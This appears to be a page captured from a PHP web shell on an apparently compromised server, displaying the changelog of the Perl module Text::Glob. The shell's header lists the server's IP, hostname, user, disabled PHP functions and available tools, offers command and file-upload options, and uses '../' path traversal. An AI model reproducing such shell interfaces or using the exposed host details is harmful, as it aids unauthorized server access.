Server IP : 192.168.23.10  /  Your IP : 18.118.128.17
Web Server : Apache
System : Linux echo.premieradvertising.com 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 7 14:54:22 EST 2023 x86_64
User : rrrallyteam ( 1049)
PHP Version : 8.1.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /home/../usr/share/doc/libidn/../perl-Text-Glob/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/../usr/share/doc/libidn/../perl-Text-Glob/Changes
0.11    Wednesday 8th March, 2016
        Regenerated tarball on a linux machine (0.10 was released from OSX
        which added non-standard extended header attributes to the tar)

0.10    Wednesday 14th September, 2016
        Added ability to alter regex seperator (patch from Mark Fowler)
        Switch distribution packaging back to ExtUtils::MakeMaker (RT#104876)

0.09    Tuesday 22nd February, 2010
        Compiled documentation fixes (collected by Tom Hukins from fixes on rt.cpan)

0.08	Wednesday 2nd May, 2007
	Expose glob_to_regex_string (Joshua Hoblitt)

0.07	Friday 14th July, 2006
	Explictly quote @ and %.  Though they don't really need it to work
	normally, it's needed for when you roundtrip the
	regex back into text (like File::Find::Rule does).

0.06    Monday 1st September, 2003
	- port to Module::Build
        - Nested alternations fix from Mike Benson
	
0.05	15th August, 2002
	- !match_glob("*.foo", "foo/.foo"); 
	- test suite overhaul
	- backslash expansion fixed
	- /[+^$|]/ made less 'special'
	- handle embedded newlines in glob patterns
	- add tests for 'foo[abc]'
	- Many thanks go to Nick Cleaton for finding these

0.04	14th August, 2002
	- $Text::Glob::{strict_leading_dot,strict_wildcard_slash} from
	  bug report from Nick Cleaton
        - (quite poor) documentation of supported globbing constructs

0.03	2nd August, 2002
	- complete work of 0.02 by escaping ) too. bug found by Andy Lester

0.02	29th July, 2002
	- fix handling of ( and ? tokens

0.01	21st July 2002
	- initital release